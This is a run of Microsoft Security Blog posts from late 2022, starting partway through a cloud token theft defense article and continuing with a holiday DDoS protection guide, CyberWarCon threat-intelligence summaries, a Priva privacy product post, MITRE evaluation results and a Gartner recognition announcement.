Organizations can take a significant step toward reducing the risk of token theft by ensuring that they have full visibility of where and how their users are authenticating. To access critical applications like Exchange Online or SharePoint, the device used should be known by the organization. Utilizing compliance tools like Intune in combination with device based conditional access policies can help to keep devices up to date with patches, antivirus definitions, and EDR solutions. Allowing only known devices that adhere to Microsoft’s recommended security baselines helps mitigate the risk of commodity credential theft malware being able to compromise end user devices.

For those devices that remain unmanaged, consider utilizing session conditional access policies and other compensating controls to reduce the impact of token theft:

Protect your users by blocking initial access:

  • Plan and implement phishing resistant MFA solutions such as FIDO2 security keys, Windows Hello for Business, or certificate-based authentication for users.
    • While this may not be practical for all users, it should be considered for users of significant privilege like Global Admins or users of high-risk applications.
  • Users that hold a high level of privilege in the tenant should have a segregated cloud-only identity for all administrative activities, to reduce the attack surface from on-premises to cloud in the event of on-premises domain compromise and abuse of privilege. These identities should also not have a mailbox attached to them to prevent the likelihood of privileged account compromise via phishing techniques.

We recognize that while it may be recommended for organizations to enforce location, device compliance, and session lifetime controls to all applications it may not always be practical. Decisionmakers should instead focus on deploying these controls to applications and users that have the greatest risk to the organization which may include:

  • Highly privileged users like Global Administrators, Service Administrators, Authentication Administrators, and Billing Administrators among others.
  • Finance and treasury type applications that are attractive targets for attackers seeking financial gain.
  • Human capital management (HCM) applications containing personally identifiable information that may be targeted for exfiltration.
  • Control and management plane access to Microsoft 365 Defender, Azure, Office 365 and other cloud app administrative portals.
  • Access to Office 365 services (Exchange, SharePoint, and Teams) and productivity-based cloud apps.
  • VPN or remote access portals that provide external access to organizational resources.


When a token is replayed, the sign-in from the threat actor can flag anomalous features and impossible travel alerts. Azure Active Directory Identity Protection and Microsoft Defender for Cloud Apps both alert on these events. Azure AD Identity Protection has a specific detection for anomalous token events. The token anomaly detection in Azure AD Identity Protection is tuned to incur more noise than other alerts. This helps ensure that genuine token theft events aren’t missed.

DART recommends focusing on high severity alerts and focusing on those users who trigger multiple alerts rapidly. Detection rules that map to the MITRE ATT&CK framework can help detect genuine compromise. For example, a risky sign-in followed closely by indicators of persistence techniques, such as mailbox rule creation.

Response and investigation

If a user is confirmed compromised and their token stolen, there are several steps DART recommends evicting the threat actor. Azure AD provides the capability to revoke a refresh token. Once a refresh token is revoked, it’s no longer valid. When the associated access token expires, the user will be prompted to re-authenticate. The following graphic outlines the methods by which access is terminated entirely:

Chart showing refresh revocation by type
Figure 5. Refresh token revocation by type

It’s crucial to use both the Azure AD portal, Microsoft Graph, or Azure AD PowerShell in addition to resetting the users’ passwords to complete the revocation process.

Importantly, revoking refresh tokens via the above methods doesn’t invalidate the access token immediately, which can still be valid for up to an hour. This means the threat actor may still have access to a compromised user’s account until the access token expires. Azure AD now supports continuous access evaluation for Exchange, SharePoint and Teams, allowing access tokens to be revoked in near real time following a ‘critical event’. This helps to significantly reduce the up to one hour delay between refresh token revocation and access token expiry.

Microsoft DART also recommends checking the compromised user’s account for other signs of persistence. These can include:

  • Mailbox rules – threat actors often create specific mailbox rules to forward or hide email. These can include rules to hide emails in folders that are not often used. For example, a threat actor may forward all emails containing the keyword ‘invoice’ to the Archive folder to hide them from the user or forward them to an external email address.
  • Mailbox forwarding – email forwarding may be configured to send a copy of all email to an external email address. This allows the threat actor to silently retrieve a copy of every email the user receives.
  • Multifactor authentication modification – DART has detected instances of threat actors registering additional authentication methods against compromised accounts for use with MFA, such as phone numbers or authenticator apps.
  • Device enrollment – in some cases, DART has seen threat actors add a device to an Azure AD tenant they control. This is an attempt to bypass conditional access rules with exclusions such as known devices.
  • Data exfiltration – threat actors may use the inbuilt sharing functionality in SharePoint and OneDrive to share important or sensitive documents and organizational resources externally.

To strengthen your security posture, you should configure alerts to review high-risk modifications to a tenant. Some examples of this are:

  • Modification or creation of security configurations
  • Modification or creation of Exchange transport rules
  • Modification or creation of privileged users or roles

Incident responders should review any audit logs related to user activity to look for signs of persistence. Logs available in the Unified Audit Log, Microsoft Defender for Cloud Apps, or SIEM solutions like Microsoft Sentinel can aid with investigations.


Although tactics from threat actors are constantly evolving, it is important to note that multifactor authentication, when combined with other basic security hygiene—utilizing antimalware, applying least privilege principals, keeping software up to date and protecting data—still protects against 98% of all attacks.

Fundamentally, it is important to consider the identity trust chain for the organization, spanning both internally and externally. The trust chain includes all systems (such as identity providers, federated identity providers, MFA services, VPN solutions, cloud-service providers, and enterprise applications) that issue access tokens and grant privilege for identities both cloud and on-premises, resulting in implicit trust between them.

In instances of token theft, adversaries insert themselves in the middle of the trust chain and often subsequently circumvent security controls. Having visibility, alerting, insights, and a full understanding of where security controls are enforced is key. Treating both identity providers that generate access tokens and their associated privileged identities as critical assets is strongly encouraged.

Adversaries have and will continue to find ways to evade security controls. The tactics utilized by threat actors to bypass controls and compromise tokens present additional challenges to defenders. However, by implementing the controls presented in this blog DART believes that organizations will be better prepared to detect, mitigate, and respond to threats of this nature moving forward.

The post Token tactics: How to prevent, detect, and respond to cloud token theft appeared first on Microsoft Security Blog.

2022 holiday DDoS protection guide

November 15th, 2022 No comments

The holiday season is an exciting time for many people as they get to relax, connect with friends and family, and celebrate traditions. Organizations also have much to rejoice about during the holidays (for example, more sales for retailers and more players for gaming companies). Unfortunately, cyber attackers also look forward to this time of year to celebrate an emerging holiday tradition—distributed denial-of-service (DDoS) attacks.

While DDoS attacks happen all year round, the holidays are one of the most popular times and where some of the most high-profile attacks occur. Last October in India, there was a 30-fold increase in DDoS attacks targeting services frequently used during the festive season, including media streaming, internet phone services, and online gaming1. Last October through December, Microsoft mitigated several large-scale DDoS attacks, including one of the largest attacks in history from approximately 10,000 sources spanning multiple countries2.

Bar chart showing the number of DDoS attacks and duration distribution from March 2021-May 2022.
Figure 1. Number of DDoS attacks and duration distribution3

While retail and gaming companies are the most targeted during the holidays, organizations of all sizes and types are vulnerable to DDoS attacks. It’s easier than ever to conduct an attack. For only $500, anyone can pay for a DDoS subscription service to launch a DDoS attack. Every year, DDoS attacks are also becoming harder to protect against as new attack vectors emerge and cybercriminals leverage more advanced techniques, such as AI-based attacks.

With the holidays coming up, we’ve prepared this guide to provide you with an overview of DDoS attacks, trends we are seeing, and tips to help you protect against DDoS attacks.

What is a DDoS attack and how does it work?

A DDoS attack targets websites and servers by disrupting network services and attempts to overwhelm an application’s resources. Attackers will flood a site or server with large amounts of traffic, resulting in poor website functionality or knocking it offline altogether. DDoS attacks are carried out by individual devices (bots) or network of devices (botnet) that have been infected with malware and used to flood websites or services with high volumes of traffic. DDoS attacks can last a few hours, or even days.

What are the motives for DDoS attacks?

There is a wide range of motives behind DDoS attacks, including financial, competitive advantage, or political. Attackers will hold a site’s functionality hostage demanding payment to stop the attacks and get sites and serves back online. We’re seeing a rise in cybercriminals combining DDoS attacks with other extortion attacks like ransomware (known as triple extortion ransomware) to extort more pressure and command higher payouts. Politically motivated attacks, also known as “hacktivism”, are becoming more commonly used to disrupt political processes. At the start of the war in Ukraine earlier in 2022, the Ukrainian government reported the worst DDoS attack in history as attackers aimed to take down bank and government websites4.  Also, cybercriminals will often use DDoS attacks as a distraction for more sophisticated targeted attacks, including malware insertion and data exfiltration.

Why are DDoS attacks so common during the holidays?

Organizations typically have reduced resources dedicated to monitoring their networks and applications—providing easier opportunities for threat actors to execute an attack. Traffic volume is at an all-time high, especially for e-commerce websites and gaming providers, making it harder for IT staff to distinguish between legitimate and illegitimate traffic. For attackers seeking financial gain, the opportunity for more lucrative payouts can be higher during the holidays as revenues are at the highest and service uptime is critical. Organizations are more willing to pay to stop an attack to minimize loss of sales, customer dissatisfaction, or damage to their reputation.

Why protect yourself from DDoS attacks?

Any website or server downtime during the peak holiday season can result in lost sales and customers, high recovery costs, or damage to your reputation. The impact is even more significant for smaller organizations as it is harder for them to recover from an attack. Beyond the holidays when traffic is traditionally the highest, ongoing protection is also important. In 2021, the day with the most recorded attacks was August 10, indicating that there could be a shift toward year-round attacks2.

Tips for protecting and responding against DDoS attacks

  1. Don’t wait until after an attack to protect yourself. While you cannot completely avoid being a target of a DDoS attack, proactive planning and preparation can help you more effectively defend against an attack.
    • Identify the applications within your organization that are exposed to the public internet and evaluate potential risks and vulnerabilities.
    • It’s important that you understand the normal behavior of your application so that you’re prepared to act if the application is not behaving as expected. Azure provides monitoring services and best practices to help you gain insights on the health of your application and diagnose issues.
    • We recommend running attack simulations to test how your services will respond to an attack. You can simulate a DDoS attack on your Azure environment with services from our testing partners—BreakingPoint Cloud and RedButton.
  2. Make sure you’re protected. With DDoS attacks at an all-time high during the holidays, you need a DDoS protection service with advanced mitigation capabilities that can handle attacks at any scale.
    • We recommend enabling Azure DDoS Protection, which provides always-on traffic monitoring to automatically mitigate an attack when detected, adaptive real time tuning that compares your actual traffic against predefined thresholds, and full visibility on DDoS attacks with real-time telemetry, monitoring, and alerts.
    • Azure DDoS Protection should be enabled for virtual networks with applications exposed over the public internet. Resources in a virtual network that require protection against DDoS attacks include Azure Application Gateway, Azure Load Balancer, Azure Virtual Machines, and Azure Firewall.
    • For comprehensive protection against different types of DDoS attacks, set up a multi-layered defense by deploying Azure DDoS Protection with Azure Web Application Firewall (WAF). Azure DDoS Protection protects the network layer (Layer 3 and 4), and Azure WAF protects the application layer (Layer 7). You receive a discount on Azure WAF when deploying DDoS Network Protection along with Azure WAF, helping to reduce costs.
    • Azure DDoS Protection identifies and mitigates DDoS attacks without any user intervention. To get notified when there’s an active mitigation for a protected public IP resource, you can configure alerts.
  3. Create a DDoS response strategy. Having a response strategy is critical to help you identify, mitigate, and quickly recover from DDoS attacks. A key part of the strategy is a DDoS response team with clearly defined roles and responsibilities. This DDoS response team should understand how to identify, mitigate, and monitor an attack and be able to coordinate with internal stakeholders and customers. We recommend using simulation testing to identify any gaps in your response strategy.
  4. Reach out for help during an attack. If you think you are experiencing an attack, you should reach out to the appropriate technical professionals for help. Azure DDoS Protection customers have access to the DDoS Rapid Response (DRR) team, who can help with attack investigation during an attack as well as post-attack analysis. Check out this guide for more details on when and how to engage with the DRR team during an active attack.
  5. Learn and adapt after an attack. While you’ll likely want to move on as quickly as possible if you’ve experienced an attack, it’s important to continue to monitor your resources and conduct a retrospective after an attack. You should apply any learnings to improve your DDoS response strategy.

Azure offers cloud native, Zero Trust based network security solutions to protect your valuable resources from evolving threats. Azure DDoS Protection provides advanced, cloud-scale protection to defend against the largest and most sophisticated DDoS attacks.

Don’t let DDoS attacks ruin your holidays! Prepare for the upcoming holiday season with this guide and make sure Azure DDoS Protection is at the top of your holiday shopping list.


1Thirty-fold increase in DDoS cyber attacks in India in festive season, CIO News, ET CIO (

2Azure DDoS Protection—2021 Q3 and Q4 DDoS attack trends

3Microsoft Digital Defense Report 2022

4Ukraine says it suffered worst DDoS Attack in Standoff

Additional resources

Azure DDoS Protection reference architectures

Components of a DDoS response strategy

Azure DDoS Protection fundamental best practices

Azure network security resources

The post 2022 holiday DDoS protection guide appeared first on Microsoft Security Blog.

Microsoft threat intelligence presented at CyberWarCon 2022 

At CyberWarCon 2022, Microsoft and LinkedIn analysts presented several sessions detailing analysis across multiple sets of actors and related activity. This blog is intended to summarize the content of the research covered in these presentations and demonstrates Microsoft Threat Intelligence Center’s (MSTIC) ongoing efforts to track threat actors, protect customers from the associated threats, and share intelligence with the security community.

The CyberWarCon sessions summarized below include:

  • “They are still berserk: Recent activities of BROMINE” – a lightning talk covering MSTIC’s analysis of BROMINE (aka Berserk Bear), recent observed activities, and potential changes in targeting and tactics.
  • “The phantom menace: A tale of Chinese nation-state hackers” – a deep dive into several of the Chinese nation-state actor sets, their operational security patterns, and case studies on related tactics, techniques, and procedures (TTPs).
  • “ZINC weaponizing open-source software” – a lighting talk on MSTIC and LinkedIn’s analysis of ZINC, a North Korea-based actor. This will be their first public joint presentation, demonstrating collaboration between MSTIC and LinkedIn’s threat intelligence teams.

MSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections and improve customer protections. As with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.

They are still berserk: Recent activities of BROMINE

BROMINE overlaps with the threat group publicly tracked as Berserk Bear. In our talk, MSTIC provided insights into the actor’s recent activities observed by Microsoft. Some of the recent activities presented include:

  • Targeting and compromise of dissidents, political opponents, Russian citizens, and foreign diplomats. These activities have spanned multiple methods and techniques, ranging from the use of a custom malicious capability to credential phishing leveraging consumer mail platforms. In some cases, MSTIC has identified the abuse of Azure free trial subscriptions and worked with the Azure team to quickly take action against the abuse.
  • Continued targeting of organizations in the manufacturing and industrial technology space. These sectors have been continuous targets of the group for years and represent one of the most durable interests.
  • An opportunistic campaign focused on exploiting datacenter infrastructure management interfaces, likely for the purpose of access to technical information of value.
  • Targeting and compromise of diplomatic sector organizations focused on personnel assigned to Eastern Europe.
  • Compromise of a Ukrainian nuclear safety organization previously referenced in our June 2022 Special Report on Defending Ukraine (

Overall, our findings continue to demonstrate that BROMINE is an elusive threat actor with a variety of potential objectives, yet sporadic insights from various organizations, including Microsoft, demonstrate there is almost certainly more to find. Additionally, our observations show that as a technology platform provider, threat intelligence enables Microsoft’s ability to protect both enterprises and consumers and disrupt threat activity affecting our customers.

The phantom menace: A tale of China-based nation state hackers

Over the past few years, MSTIC has observed a gradual evolution of the TTPs employed by China-based threat actors. At CyberWarCon 2022, Microsoft analysts presented their analysis of these trends in Chinese nation-state actor activity, covering:

  • Information about new tactics that these threat actors have adopted to improve their operational security, as well as a deeper look into their techniques, such as leveraging vulnerable SOHO devices for obfuscating their operations.
  • Three different case studies, including China-based DEV-0401 and nation-state threat actors GALLIUM and DEV-0062, walking through (a) the initial vector (compromise of public-facing application servers, with the actors showing rapid adoption of proofs of concept for vulnerabilities in an array of products), (b) how these threat actors maintained persistence on the victims (some groups dropping web shells, backdoors, or custom malware), and (c) the objectives of their operations: intelligence collection for espionage.
  • A threat landscape overview of the top five industries that these actors have targeted—governments worldwide, non-government organizations (NGO)s and think tanks, communication infrastructure, information technology (IT), and financial services – displaying the global nature of China’s cyber operations in the span of one year.

As demonstrated in the presentation, China-based threat actors have targeted entities nearly globally, employing techniques and using different methodologies to make attribution increasingly harder. Microsoft analysts assess that China’s cyber operations will continue to move along their geopolitical agenda, likely continuing to use some of the techniques mentioned in the presentation to conduct their intelligence collection. The graphic below illustrates how quickly we observe China-based threat actors and others exploiting zero-day vulnerabilities and then those exploits becoming broadly available in the wild.

Chart showing that after a vulnerability is publicly disclosed, it takes only 14 days on average for an exploit to be available in wild, 60 days for POC code to be released on GitHub, and 120 days for the exploit to be available in scanning tools.
Figure 1. The speed and scale of vulnerability exploitation. Image source: Microsoft Digital Defense Report 2022

ZINC weaponizing open-source software

In this talk, Microsoft and LinkedIn analysts detail recent activity of a North-Korea based nation-state threat actor we track as ZINC. Analysts detailed the findings of their investigation (previously covered in this blog) and walked through the series of observed ZINC attacks that targeted 125 different victims spanning 34 countries, noting the attacks appear to be motivated by traditional cyber-espionage and theft of personal and corporate data. A few highlights include:

  • In September 2022, Microsoft disclosed detection of a wide range of social engineering campaigns using weaponized legitimate open-source software. MSTIC observed activity targeting employees in organizations across multiple industries including media, defense and aerospace, and IT services in the US, UK, India, and Russia.
  • Based on the observed tradecraft, infrastructure, tooling, and account affiliations, MSTIC attributes this campaign with high confidence to ZINC, a state-sponsored group based out of North Korea with objectives focused on espionage, data theft, financial gain, and network destruction.
  • When analyzing the data from an industry sector perspective, we observed that ZINC chose to deliver malware most likely to succeed in a specific environment, for example, targeting IT service providers with terminal tools and targeting media and defense companies with fake job offers to be loaded into weaponized PDF readers.
  • ZINC has successfully compromised numerous organizations since June 2022, when the actor began employing traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets.
  • Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads. MSTIC observed ZINC weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks. ZINC was observed attempting to move laterally across victim networks and exfiltrate collected information from.
Diagram showing end-to-end attack chain of a ZINC attack, from initial compromise and execution, to persistence, command and control, discovery, and collection
Figure 2. ZINC attack chain.  Read more in our detailed blog: ZINC weaponizing open-source software.

As the threat landscape continues to evolve, Microsoft strives to continuously improve security for all, through collaboration with customers and partners and by sharing our research with the larger security community. We would like to extend our thanks to CyberWarCon and LinkedIn for their community partnership.

The post Microsoft threat intelligence presented at CyberWarCon 2022  appeared first on Microsoft Security Blog.

Simplify privacy protection with Microsoft Priva Subject Rights Requests

November 10th, 2022 No comments

The General Data Protection Regulation (GDPR) came into effect in 2018 and set a new standard for the level of control individuals in the European Union had on the personal data they shared online. Since then, the number of privacy regulations around the world has flourished and impacted the privacy landscape we see today. According to Gartner®, by the end of 2024, three-quarters of the world’s population will have its personal data covered by modern privacy regulations.1 Today, additional regulations like the California Consumer Privacy Act (CCPA) and Brazil’s Lei Geral de Proteção de Dados (LGPD) empower people to exercise their right to request the personal data that organizations have collected from them.

When organizations respond to subject rights requests, they are both meeting their regulatory requirements and providing people with control over their personal data. Although responding to requests can be quite complex, Microsoft Priva Subject Rights Requests can help ease the process—and with the preview arrival of Right to be Forgotten, Priva Subject Rights Requests can further support how organizations respect the privacy of their customers and employees.

Understanding how people think about privacy

As many businesses around the world adapt their privacy practices, having both the tools that help address privacy requirements and a good understanding of how consumers perceive and feel about privacy are key to enabling trust with customers. Microsoft Priva, the brand category for Microsoft Security, was announced at Microsoft Ignite in 2021 by Vasu Jakkal, Corporate Vice President of Microsoft Security, Compliance, and Identity.2 Priva solidified our commitment to supporting organizations in their privacy journey with products that help safeguard personal data and manage subject rights requests at scale. For organizations, having processes that help manage their privacy is critical, but it is also valuable to have a deep understanding of how people really think about privacy to guide their practices. We recently commissioned privacy research that explores the emotional textures of privacy and what triggers privacy vulnerability. We learned that when businesses empathize with the privacy concerns people have and transparently address them, they foster trust and differentiate themselves from competitors.

It’s important for organizations to assess the varying causes that spark privacy vulnerability for both their consumers and their business. For example, a consumer may feel anxious or helpless because they don’t know how their personal data is being used. However, if they are provided with transparency of how their data is being used and given clear options that enable the control of their data, their insecurities could be eased and trust in the process earned. For a business, privacy vulnerability could present itself through limited transparency or basic compliance—leaving room for privacy risk to potentially unfold. For instance, a business that might fulfill a data subject request unconvincingly, or with basic effort, could be managing its privacy at a vulnerable level. If that business were to practice a “beyond-compliance,” human-centered privacy approach, they could yield practices that help them build privacy resilience—helping them stand apart from their competitors while they earn trust from their customers.

Gradient scale bar showing Privacy vulnerable on one end and Privacy resilient on the other. The scale is from the consumer perspective and the business perspective.

Figure 1. The differing perspectives of consumers and businesses regarding privacy vulnerability versus privacy resilience.

The above figure demonstrates a privacy scale ranging from vulnerable to resilient and includes both consumer and business perspectives. On the consumer side, it ranges from feeling anxious, helpless, and lacking knowledge or motivation in protective coverage to secure, being in control, trusting the process, and being skilled in protective coverage. On the business side, it ranges from basic compliance, limited transparency, minimal control, and reactive approaches to beyond compliance, authentic privacy care, reciprocating data for value, and a proactive approach to consumer protection.

Microsoft Priva Subject Rights Requests can help

Many times, even though an organization may be focused on a proactive privacy approach, managing and responding to subject rights requests can be a tedious and cumbersome process. It can be extremely time-consuming and taxing as they are also time-bound, bringing extra complexity to the organization. Responding to these requests often requires a tremendous amount of collaboration and manual review, and producing just a single request can be quite expensive. Nonetheless, completing these requests is not just an obligatory requirement, but also a tangible way that expresses respect for customer and employee privacy.

Priva helps organizations more efficiently manage requests at scale—Priva Subject Rights Requests automates the search and collection of content relevant to the data subject and facilitates tasks such as in-line review, redaction, and collaboration, all from an easy-to-use dashboard. Admins can easily get started by leveraging request templates that help them create requests with recommended default configurations and use Microsoft Power Automate integration, as well as API support to better fit into their existing processes.

Priva Subject Rights Requests dashboard, showing detailed insights for subject rights requests: including active, closed and overdue requests, as well as a circle and line graph showing status of requests and request types.

Figure 2. Priva Subject Rights Requests overview dashboard showing insights.

Priva Subject Rights Requests help admins meet the strict deadlines associated with regulations like GDPR and ease the administrative burden of tedious tasks related to collection, review, and redaction. Completing a request also often requires teamwork from various departments within the organization. Priva provides secure collaboration through Microsoft Teams and keeps a history tab, highlighting actions taken from all collaborators for easy auditing—streamlining the complexity of requests from beginning to post-completion.

Microsoft Priva Subject Rights Requests highlights:

  • Automates discovery: Gathers the requestor’s personal information and detects data conflicts such as sensitive information or data pertaining to other users.
  • In-place review and secure collaboration: Review files in place in their native views, perform redactions in-line with built-in tools, and consolidate collaboration within a protected platform.
  • Ecosystem integration: Plugs into an organization’s existing process to manage requests in a unified way across the digital estate. Microsoft Graph subject rights requests API integrates Priva Subject Rights Requests with in-house or partner-built privacy solutions.

The newest Priva Subject Rights Requests update, Right to be Forgotten, is here

Delete request type option selected under the “Select the type of request” menu from the Priva Subject Rights Requests custom request creation process.

Figure 3. Admins can select delete as a request type on Priva Subject Rights Requests.

Both GDPR and CCPA include the Right to be Forgotten, giving people the ability to request the deletion of all the information an organization has collected about them, with a few outlined exceptions that allow data retention. For example, a former employee in an EU-based company believes she left documents containing her personal data in SharePoint. The employee can exercise her right to her personal data and make a subject rights request for deletion with that organization. As Priva Subject Rights Requests continues to evolve, we are excited to share the preview release of Right to be Forgotten, helping organizations meet requests such as the employee’s request for deletion.

This marks a significant update for Priva Subject Rights Requests as with this new feature, admins can now select delete as a request type, or get started with the delete template and get purpose-built flows that help surface conflicts and streamline deletion—leveraging the Microsoft retention and deletion platform and working better together with teams already using data lifecycle management and records management. This feature will also enable admins to have the flexibility to select different approvers for any given request and, once the workflow is complete, access to the reports tab where they can view their summary report and review results.

Sample delete request for employee in stage 3 of 5, where the designated approver is to complete approval to proceed to stage 4 of 5.

Figure 4. Delete request in the approval stage, showcasing approver details and the complete approval button.

Learn more

Although completing subject rights requests can be complex, Microsoft Priva Subject Rights Requests can help ease the process. As organizations continue to adapt to the privacy changes that impact their customers and their business, we are reminded that although changes to the privacy landscape are inevitable, there are resources to support these shifts. We invite you to learn more about Priva Subject Rights Requests by downloading our free eBook and encourage you to try Microsoft Priva Subject Rights Requests free trial today.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

1State of Privacy: The Privacy Tech Driving a New Age of Data Wealth, Gartner®. August 2022.

2Protect your business with Microsoft Security’s comprehensive protection, Vasu Jakkal, Microsoft Security. November 2, 2021.

The post Simplify privacy protection with Microsoft Priva Subject Rights Requests appeared first on Microsoft Security Blog.

Categories: cybersecurity, Data Protection, privacy Tags:

Microsoft Defender Experts for Hunting demonstrates industry-leading protection in the 2022 MITRE Engenuity ATT&CK® Evaluations for Managed Services

November 9th, 2022 No comments

Microsoft Defender Experts for Hunting, our newest managed threat hunting service, delivered industry-leading results during the inaugural MITRE Engenuity ATT&CK® Evaluations for Managed Services.

We provided a seamless, comprehensive, and rapid response to the simulated attack using expert-led threat hunting and an industry-leading extended detection and response (XDR) platform—Microsoft 365 Defender. This evaluation showcased our service’s strength in the following areas:

  • In-depth visibility and analytics across all stages of the attack chain.
  • Comprehensive managed hunting.
  • Seamless alert prioritization and consolidation into notifications for the security operations center (SOC).
  • Tailored hunting guidance and advanced hunting queries (AHQ) to optimize investigations.
  • Frequently updated and customized recommendations for rapid containment and remediation.
  • Threat actor attribution with tactics, techniques, and procedures (TTP) context.
  • Technology powered by a team of expert hunters and a customer-centric approach.
  • Commitment to managed extended detection and response (MXDR) partners running on Microsoft 365 Defender.

In-depth visibility and analytics across all stages of the attack chain

Diagram representing a snake of how we represented the MITRE attack and our coverage.

Figure 1. Microsoft Defender Experts for Hunting coverage. Fully reported—including initial access, execution, persistence, credential access, lateral movement, and collection—reflects 100 percent acceptance of evidence submission. Majority reported—including defense evasion, discovery, exfiltration, and command and control—reflects some gaps in evidence acceptance.

Comprehensive managed hunting

Microsoft Defender Experts for Hunting team identified all threats and provided a cohesive attack timeline with remediation guidance.

From the early stages of the intrusion, our hunters alerted the customer that a malicious archive masquerading as marketing materials was potentially part of a targeted attack. After a user opened the archive, a threat actor, which we attributed with high confidence as EUROPIUM, gained access to the environment.

Over the next few days, the threat actor used this foothold to steal credentials, move laterally in the network, deploy a web shell on an Exchange Server, and escalate privileges in the domain. The threat actor ultimately used their access to target sensitive data on an SQL server. Based on available telemetry, we reported that the threat actor staged sensitive data and may have successfully exfiltrated the data through email using a malicious RDAT utility.

Bar chart showing results of Microsoft against all other vendors participating in this evaluation.

Figure 2. Microsoft results compared to all other vendors out of 76 total techniques.

Microsoft threat hunters discovered and investigated all of the essential and impactful TTPs used in this evaluation.

Seamless alert prioritization and consolidation into notifications for the SOC

From initial malware execution to data theft, Microsoft 365 Defender seamlessly detected and correlated alerts from all stages of the attack chain into two overarching incidents that provided end-to-end attack stories (see Figure 3). Microsoft 365 Defender’s incident correlation technology helps SOC analysts to counter alert fatigue, and our hunters then enrich these incidents by finding new attacks with the existing deep signals and custom alerting.

Two Incidents identified and enriched by our Defender Experts for Hunting Team.

Figure 3. Consolidated incidents enriched by Defender Experts for Hunting as illustrated in the above tags.

Our hunters followed up on automated alerting with Defender Expert notifications (DENs) to provide additional context on the threat activity with an executive summary, threat actor attribution, detailed scope of impact, recommendations, and advanced hunting queries to self-serve investigations and response actions. This human enrichment helps the customer prioritize their time and focused actions in the SOC.

Custom advanced hunting queries provided by our Defender Experts for Hunting Team in Microsoft 365 Defender.

Figure 4. Beginning of incident executive summary provided by Defender Experts.

Tailored hunting guidance and AHQ to optimize investigations

Within the DENs, our hunters additionally provided tailored hunting guidance and AHQs to enable investigators to hunt for and identify relevant attack activity in each incident. Figure 5 shows one example where we directly flagged to the customer that a series of file modification events were consistent with data exfiltration attempts.

Custom advanced hunting queries provided by our Defender Experts for Hunting Team in M365D.

Figure 5. Example of running provided AHQs to surface activity of interest.

Frequently updated and customized recommendations for containment and remediation

Throughout the attack, our hunters regularly shared remediation guidance to aid the customer in a rapid response (Figure 6). As the incident developed, using the Recommendation Summary, we kept the customer apprised of the scope of the attack and the efforts needed to contain it.

Recommendations for remediation provided by our Defender Experts for Hunting Team.

Figure 6. Excerpt of custom recommendations in the Microsoft 365 Defender portal.

Threat actor attribution with TTP context

Microsoft Defender Experts for Hunting provided the customer with nation-state attribution based on observed TTPs and behaviors. We identified the activity was consistent with the threat actor EUROPIUM, also known as APT34 and OilRig, which Microsoft has observed as far back as 2015. EUROPIUM is a well-resourced actor capable of multiple types of attacks—from spear phishing and social engineering to remote exploitation of internet-facing devices.

We leveraged this attribution to provide valuable incident context, such as potential intrusion goals and relevant TTP, to the customer.

Nation state attribution of this attack by Defender Experts for Hunting Team.

Figure 7. Incident attribution in Microsoft 365 Defender portal.

Technology powered by a team of expert hunters

The Microsoft philosophy in this evaluation was to represent product truth and real-world service delivery for our customers. We participated in the evaluation using our Defender Experts for Hunting team and product capabilities and configurations that we expect customers to use. As you review evaluation results, you should consider additional aspects including depth and durability of protection, completeness of signals, actionable insights, and the quality of what our hunters provided to enrich both the incidents and component alerts. All of these factors are critical in delivering a world-class hunting service to protect real customer production environments.

Commitment to MXDR partners running on Microsoft 365 Defender

Microsoft supported several of our verified MXDR partners in this evaluation. Our collaborative efforts reinforce our commitment to our partners’ success in building managed services to meet growing demand and support our joint customers.

We thank MITRE Engenuity for the opportunity to contribute to and participate in this year’s evaluation.

The MITRE Engenuity ATT&CK Evaluations Managed Services OilRig 2022 participant badge.

Read more about the MITRE Managed Services Evaluations.

Learn more

Learn more about Microsoft Defender Experts for Hunting.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

© November 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

The post Microsoft Defender Experts for Hunting demonstrates industry-leading protection in the 2022 MITRE Engenuity ATT&CK® Evaluations for Managed Services appeared first on Microsoft Security Blog.

Microsoft named a Leader in 2022 Gartner® Magic Quadrant™ for Access Management for the 6th year

November 4th, 2022 No comments

We are honored to announce that Microsoft has been named a Leader in the 2022 Gartner® Magic QuadrantTM for Access Management for Microsoft Azure Active Directory (Azure AD), part of Microsoft Entra.

Gartner Magic Quadrant graphic showing Microsoft positioned in the top right hand quadrant as a Leader.

We thank our customers who guide our strategy and product innovation, engage with us deeply in co-creating modern and secure identity solutions, and provide invaluable feedback that helps us continually raise the bar. We believe this incredible partnership has propelled us to be recognized as a Leader for the 6th year in a row and inspires us to grow our product portfolio, introducing innovative solutions so that our customers can do more with less.

Secure access for a connected world

As organizations have adopted new technologies to expand their digital environments, managing identities and access has become much more complex and time-consuming. To innovate without fear, organizations must ensure that they effectively protect their expanding digital estate as every new service immediately becomes a new attack surface. That’s why we’re building our identity solution as a pervasive trust fabric that can secure access to everything for everyone, whether that be within on-premises, Azure, Amazon Web Services, Google Cloud Platform, apps, websites, devices, or wherever organizations expand next.

To pave the way for the next generation of identity solutions, earlier this year as we announced Microsoft Entra, our new identity and access product family that can help any organization:

  • Protect access to every app and every resource for every user.
  • Effectively secure every identity including employees, customers, partners, apps, devices, and workloads across every environment.
  • Discover and right-size permissions, manage access lifecycles, and ensure least privilege access for any identity.
  • Keep users productive with simple sign-in experiences, intelligent security, and unified administration.

Discover the Microsoft Entra product family

Following our identity innovations announced at Microsoft Ignite 2022, the Microsoft Entra product family includes:

Learn more

You can learn more by reading the full 2022 Gartner® Magic QuadrantTM for Access Management report. To learn more about the Microsoft Entra portfolio and its products, visit our website and check out our Ignite session covering our recent Microsoft Entra innovations.

